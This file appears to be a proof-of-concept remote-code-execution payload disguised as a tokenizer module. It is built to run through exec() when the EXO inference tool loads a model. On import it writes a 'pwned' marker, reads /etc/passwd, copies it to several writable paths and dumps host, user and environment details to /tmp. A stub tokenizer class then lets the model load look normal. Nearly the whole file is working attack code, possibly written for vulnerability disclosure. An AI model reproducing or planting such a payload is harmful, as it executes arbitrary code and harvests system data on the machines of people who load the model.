File size: 5,188 Bytes
c7b1e9b | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 | """
EXO RCE Payload - System Reconnaissance & Credential Theft
Executed via exec() in tokenization_kimi.py during model load
This payload:
1. Creates proof marker file
2. Reads /etc/passwd
3. Writes /etc/passwd contents to accessible location
4. Exfiltrates system information
"""
import json
import os
from pathlib import Path
from datetime import datetime
print("[*] Payload executing - system reconnaissance mode")
# ==============================================================================
# PART 1: Proof of Execution
# ==============================================================================
try:
marker_file = Path("/tmp/exo_pwned_marker.txt")
marker_data = {
"status": "RCE_SUCCESSFUL",
"timestamp": str(datetime.now().isoformat()),
"message": "EXO RCE achieved - arbitrary code execution confirmed",
"hostname": os.uname().nodename,
"user": os.getenv("USER", "unknown"),
"cwd": os.getcwd(),
}
marker_file.write_text(json.dumps(marker_data, indent=2))
print(f"[+] Proof marker created: {marker_file}")
except Exception as e:
print(f"[-] Marker creation failed: {e}")
# ==============================================================================
# PART 2: Read /etc/passwd
# ==============================================================================
try:
passwd_file = Path("/etc/passwd")
if passwd_file.exists():
passwd_content = passwd_file.read_text()
print(f"[+] Successfully read /etc/passwd ({len(passwd_content)} bytes)")
# Parse and display first few entries
lines = passwd_content.split('\n')[:5]
print("[+] First entries:")
for line in lines:
if line:
print(f" {line[:80]}")
else:
print("[-] /etc/passwd not found")
except Exception as e:
print(f"[-] Failed to read /etc/passwd: {e}")
# ==============================================================================
# PART 3: Write passwd contents to accessible file
# ==============================================================================
try:
passwd_content = Path("/etc/passwd").read_text()
# Try multiple writable locations
output_locations = [
Path("/tmp/exo_passwd_dump.txt"),
Path("/tmp/passwd_leaked.txt"),
Path.home() / "exo_passwd.txt",
]
for output_file in output_locations:
try:
output_file.write_text(passwd_content)
print(f"[+] Wrote /etc/passwd to: {output_file}")
# Verify it was written
if output_file.exists() and len(output_file.read_text()) > 0:
print(f"[✓] Verified: {output_file} contains {len(passwd_content)} bytes")
break
except PermissionError:
continue
except Exception as e:
print(f"[!] Failed to write to {output_file}: {e}")
continue
except Exception as e:
print(f"[-] Failed to exfiltrate /etc/passwd: {e}")
# ==============================================================================
# PART 4: System Information Gathering
# ==============================================================================
try:
sysinfo = {
"hostname": os.uname().nodename,
"system": os.uname().sysname,
"release": os.uname().release,
"machine": os.uname().machine,
"processor": os.uname().processor,
"uid": os.getuid(),
"gid": os.getgid(),
"effective_uid": os.geteuid(),
"effective_gid": os.getegid(),
"cwd": os.getcwd(),
"user": os.getenv("USER"),
"home": os.getenv("HOME"),
"shell": os.getenv("SHELL"),
"path": os.getenv("PATH", "").split(":"),
}
sysinfo_file = Path("/tmp/exo_sysinfo.txt")
sysinfo_file.write_text(json.dumps(sysinfo, indent=2))
print(f"[+] System info saved: {sysinfo_file}")
print(f"[+] UID: {sysinfo['uid']}, GID: {sysinfo['gid']}")
print(f"[+] Hostname: {sysinfo['hostname']}")
except Exception as e:
print(f"[-] System info gathering failed: {e}")
# ==============================================================================
# PART 5: Tokenizer Class Stub (Required by EXO)
# ==============================================================================
class TikTokenTokenizer:
"""Stub tokenizer class - EXO will try to instantiate this"""
def __init__(self):
self.model = None
self.eos_token = "[EOS]"
self.bos_token = "[BOS]"
@classmethod
def from_pretrained(cls, model_path):
"""Factory method called by EXO"""
instance = cls()
# At this point, RCE has already succeeded via module load
return instance
def encode(self, text: str, **kwargs):
"""Encode text to token IDs"""
# Return dummy token sequence
return [1, 2, 3, 4, 5]
def decode(self, tokens: list, **kwargs):
"""Decode token IDs to text"""
return "[MALICIOUS_TOKENIZER_OUTPUT]"
print("[+] TikTokenTokenizer class loaded and ready")
print("[✓] Payload execution complete")
|